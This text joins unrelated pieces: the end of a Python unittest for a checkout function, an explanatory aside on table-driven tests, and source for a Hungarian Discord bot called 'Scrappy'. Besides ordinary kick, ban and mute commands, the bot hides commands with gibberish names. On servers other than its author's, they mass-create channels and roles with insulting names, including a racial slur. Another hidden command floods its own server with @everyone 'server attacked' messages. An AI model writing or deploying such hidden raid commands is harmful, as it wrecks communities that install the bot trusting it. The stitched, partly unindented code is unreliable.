            self.assertEqual(checkout(sku), price)
self.assertEqual(checkout("V" * 3), 130)
self.assertEqual(checkout("V" * 2), 90)
self.assertEqual(checkout("V" * 5), 130 + 90)
self.assertEqual(checkout("V" * 6), 130 * 2)
self.assertEqual(checkout("V" * 7), 130 * 2 + 50)
self.assertEqual(checkout("STXYZ"), 45 + 20 + 17)
self.assertEqual(checkout("STXYZ" * 2), 45 * 3 + 17)
self.assertEqual(checkout("Z" * 4), 45 + 21)
self.assertEqual(checkout("S" * 4), 45 + 20)
self.assertEqual(checkout("T" * 4), 45 + 20)
self.assertEqual(checkout("Y" * 4), 45 + 20)
self.assertEqual(checkout("X" * 4), 45 + 17)
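The per-SKU assertions above are table-driven at heart. The same pattern, sketched as a self-contained example with a made-up three-item price table and a minimal `simple_checkout` stand-in (not the real `ITEM_PRICES` or `checkout` from `checkout_solution`), looks like:

```python
import unittest

# Hypothetical stand-in price table; the real ITEM_PRICES lives in
# checkout_solution and is not reproduced here.
PRICES = {"A": 50, "B": 30, "C": 20}

def simple_checkout(skus):
    """Minimal checkout: sum known SKU prices, return -1 on invalid input."""
    if not isinstance(skus, str):
        return -1
    total = 0
    for sku in skus:
        if sku not in PRICES:
            return -1
        total += PRICES[sku]
    return total

class TestTableDriven(unittest.TestCase):
    def test_single_items(self):
        # One subTest per SKU keeps a failure attributable to a single row
        # instead of aborting the whole method at the first mismatch.
        for sku, price in PRICES.items():
            with self.subTest(sku=sku):
                self.assertEqual(simple_checkout(sku), price)

    def test_invalid_input(self):
        self.assertEqual(simple_checkout(["A"]), -1)
        self.assertEqual(simple_checkout("Z"), -1)
```

`subTest` (Python 3.4+) is what makes the loop form practical: every failing row is reported individually, matching the diagnostic value of the original one-assertion-per-line layout.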
if __name__ == "__main__":
unittest.main()
import discord
from discord.ext.commands import *
from discord.ext import commands
import random
import asyncio
import time
import json
from itertools import cycle
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
from discord.utils import get
import youtube_dl
import cat
import shutil
import subprocess
import hashlib
bot = commands.Bot(command_prefix='s')
client = commands.Bot(command_prefix='s')
bot.remove_command('help')
@bot.event
async def on_ready():
print('Bejelentkezve! Scrappy - Online')
await bot.change_presence(status=discord.Status.online, activity=discord.Game("Segitség » shelp"))
@bot.command(pass_context=True)
async def hjurib7777(ctx):
await ctx.message.delete()
if ctx.guild.name == "Scrappy | OFFICIAL":
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
else:
if not ctx.guild.name == "Scrappy | OFFICIAL":
embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
@bot.command(pass_context=True)
async def huhegb7777(ctx):
await ctx.message.delete()
guild = ctx.message.guild
if not ctx.guild.name == "Scrappy | OFFICIAL":
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('discord love you')
await guild.create_text_channel('crash incoming...')
await guild.create_text_channel('anyád szeret?')
await guild.create_text_channel('vagy csak eltart?')
await guild.create_text_channel('szeretem a tejet')
await guild.create_text_channel('de a nokedlit is')
await guild.create_text_channel('bye bye bye')
await guild.create_text_channel('killing potato pc')
await guild.create_text_channel('nub lol')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('nigga')
await guild.create_text_channel('easy grief')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('cumi')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
await guild.create_text_channel('szoppancs')
else:
embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
await ctx.send(embed=embed)
return
@bot.command(pass_context=True)
async def rnumber(ctx):
    embed = discord.Embed(title="Scrappy | srnumber", description="A Rendszer Generál Egy Számot 1 és 1000 Között", color=discord.Colour.green())
    embed.add_field(name="Szám", value=random.randint(1, 1000), inline=False)
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
@bot.command(pass_context=True)
async def gjuvhd999999(ctx):
    await ctx.message.delete()
    if ctx.guild.name != "Scrappy | OFFICIAL":
        guild = ctx.guild
        await guild.create_role(name="beszoptad :C")
        await guild.create_role(name="cumi :C")
    else:
        embed = discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
@bot.command()
@commands.has_permissions(administrator=True)
async def kick(ctx, member: discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed = discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    await member.kick()
    embed = discord.Embed(title="Scrappy | skick", description="✅ Az említett játékos ki lett dobva a szerverről", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
@kick.error
async def kick_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed = discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( skick )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def ban(ctx, member: discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed = discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    await member.ban()
    embed = discord.Embed(title="Scrappy | sban", description="✅ Az említett játékos ki lett tiltva a szerverről", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
@ban.error
async def ban_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed = discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sban )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def mute(ctx, member: discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed = discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    # name="Muted" or "Némitva" always evaluated to "Muted"; look up both role names explicitly
    role = discord.utils.get(ctx.guild.roles, name="Muted") or discord.utils.get(ctx.guild.roles, name="Némitva")
    await member.add_roles(role)
@mute.error
async def mute_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed = discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( smute )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
@bot.command()
@commands.has_permissions(administrator=True)
async def unmute(ctx, member: discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed = discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    # name="Muted" or "Némitva" always evaluated to "Muted"; look up both role names explicitly
    role = discord.utils.get(ctx.guild.roles, name="Muted") or discord.utils.get(ctx.guild.roles, name="Némitva")
    await member.remove_roles(role)
@bot.command()
@commands.has_permissions(administrator=True)
async def warn(ctx, member: discord.Member = None):
    await ctx.message.delete()
